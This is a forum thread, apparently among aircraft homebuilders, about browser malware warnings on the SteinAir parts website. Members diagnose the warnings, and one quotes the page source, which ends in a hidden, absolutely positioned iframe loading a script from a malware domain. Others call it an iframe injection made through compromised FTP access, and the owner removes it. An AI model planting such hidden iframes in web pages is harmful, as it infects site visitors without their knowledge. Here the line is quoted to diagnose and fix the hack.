[RV7Guy]

When I go to the Steinair website, I'm getting a Malware warning. Anyone else getting that. I need some stuff!!!

 

[Bugsy]

worked for me

I just tried it out and I didn't get an error from my virus checker. it came up fine.

 

[rleffler]

When I go to the Steinair website, I'm getting a Malware warning. Anyone else getting that. I need some stuff!!!

Please drop Stein an email letting him know what error you are seeing and what product is generating the error.

It may or may not be real, but at least that will help Stein's webmaster troubleshoot the issue even if it's just a false positive.

I use ESET Nod32 and didn't see any problems.

bob

 

[luv2flypilot]

Steinair Website

I also got the same warning last week when I purchased some items from the site.

 

[RV7Guy]

Email sent

I fired off an email right away. I use Mac's and this is the first time in 4 years I've ever experienced that.

Maybe that is his customer screening device.

 

[hydroguy2]

No problem for me,

but I did send them an email last week and got no response yet.

 

[Paul Thomas]

I happens on the home page, I'm having the same problem on a Mac. It may have to do with the latest Safari update as it didn't happen last month, before I update. Then again, the website could have changed during that time.

Here is the info on the malware alert:
http://google.com/safebrowsing/diagnostic?tpl=safari&site=thingre.com&hl=en-us

 

[rocketbob]

I use Google Chrome, and when hitting Steinair.com it reports:

Warning: Visiting this site may harm your computer!
The website at steinair.com contains elements from the site thingre.com, which appears to host malware ? software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for thingre.com.
Learn more about how to protect yourself from harmful software online.

 

[TSwezey]

I use Google Chrome, and when hitting Steinair.com it reports:

Warning: Visiting this site may harm your Bank Account!
The website at steinair.com contains elements from the site thingre.com, which appears to host malware ? software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for thingre.com.
Learn more about how to protect yourself from harmful software online.

I fixed it for you!

 

[N5XL]

Here is a screen grab of Stein's website taken about 10 minutes ago in a pretty locked down Firefox 3.5.3 browser. No warning messages and I can browse the site correctly. I also have no issues with the website in IE8.

Here is a screen grab of the blocking page due to malware that Paul message identified. It identifies the problem element as being from "thingre.com"

With that in mind, opening up the page source for Steins website reveals the issue in the very last line of code...the problem URL.


<p align="center"><font face="Arial" size="1">Copyright 2000-2008 SteinAir, Inc.<br>
All Rights Reserved, all content is property of SteinAir Inc.<br>
Homebuilding / Avionics Supplies, Projects & Resources</font></p>
<p align="center"><font face="Arial" size="1">
<img src="_vti_bin/fpcount.exe/?Page=_borders/bottom.htm|Image=3" alt="Hit Counter"></font></p>
<p align="center"><a href="MULLICOUPE/mullicoupe.htm">
<span style="background-color: #C0C0C0"><font face="Arial" size="5">The</font></span></a><span style="background-color: #C0C0C0"><font face="Arial" size="5"><a href="MULLICOUPE/mullicoupe.htm">
Mullicoupe Project</a></font></span></p>
<p align="center"><b><font face="Arial" size="4"><a href="G900x.htm"> GARMIN
G900X EFIS</a></font></b></p>
<p>
<iframe src="http://thingre.com/in.php" width="495" height="14" style="visibility: hidden; position: absolute; left: 11; top: 3495; width: 505px">
</iframe></p>


My guess is that this code would be inserted from Steins web hosting service and not his homepage code per se, but someone more savvy in this kind of thing would need to say so for sure. If this is the case, then the web hosting service has malware / browser redirect issues and should be notified.

Why some are getting this warning depends on individual browsers, (Chrome and Safari are the same basic code) and browsers security settings.

 

[N713R]

Same problem.

I'm on a Mac, and get the same warning.

 

[jetjok]

Yep

I'm on a Mac, and get the same warning.

Mac here....Same results

 

[bhassel]

you're correct on the embedded url. It also shows up with Trend Micro Security (see below). Not sure how it got there, could be a hacker or... but hte site it leads to is bad juju according to multiple security software packages.

bob

========================================


Blocked by Trend Micro
Trend Micro Internet Security has identified this Web page as undesirable.

--------------------------------------------------------------------------------

Address: Credibility: Dangerous


If you still want to see this blocked page:
Click the Windows Start button and launch Trend Micro Internet Security from the list under All Programs.


Click Internet & Email Controls.


Click the Settings... button under Parental Controls or Protection Against Web Threats.


Click the List of Approved Web Sites link in the next window that opens.


Copy and paste the address of the blocked Web site into the list.


Note: If you think that Trend Micro Internet Security should not block this Web page, please notify Trend Micro by clicking this button:



--------------------------------------------------------------------------------

Copyright © 1995-2007 Trend Micro Incorporated. All Rights Reserved.


Bob

 

[Bob'sRV6A]

I have a PC with Kaspersky antivirus and it showed a virus at Steinair--then locked up my computer. Had to use the Task Manager to get out. Serious problems there.

 

[SteinAir]

Hi Guys,

Thanks for the notice. I was not in the office this weekend, but I'll get on it first thing tomorrow morning for sure! Don't know what's going on, but I will find out!

Cheers,
Stein

 

[bhassel]

Stein as someone else noticed - it's teh last line of the source code on your web page. Someone probably hacked it. I'm not sure who your web host is but I've been using http://www.1and1.com for years with no issues. I have mulitple sites that I run, support is good, cost is great, database, email addresses, etc.

If you can be hacked like that you may want more protection that a major web host player can give you.

Bob

 

[SteinAir]

You're right...sure as heck...it's a hack. I think for the short term I got rid of it, looks like someone may have sneaked around my FTP access. I went into the code and deleted everything I could find that referenced the malware, but given the small amount of resources available here at home, I'll have to try tomorrow and fix it for good.

I'll have to do a refresh on the website tomorrow, blow away the entire thing and have it reinstalled. Oh the fun of running a business!

Cheers,
Stein

 

[Paul Thomas]

I just loaded you page without issue so your short term fix is working. I'd give the hosting company a call, it's likely the other sites hosted on the same server were hit. They also may be able to track it down but , at the very least, they'll be able to keep an eye on it.

 

[pgroell]

Iframe injection

Looking at the code, shows you might have been subject to what is called Iframe injection (see here http://www.memwg.com/whats-an-iframe-injection/).
Recent cases of this problem have been known to be due to an infected PC accessing the FTP account.
Si it might not be your ISP's problem, but somebody maintaining your website and accessing the FTP with an infected computer. Maybe checking when and where the last changes were made could provide some clue.
My 2 cents.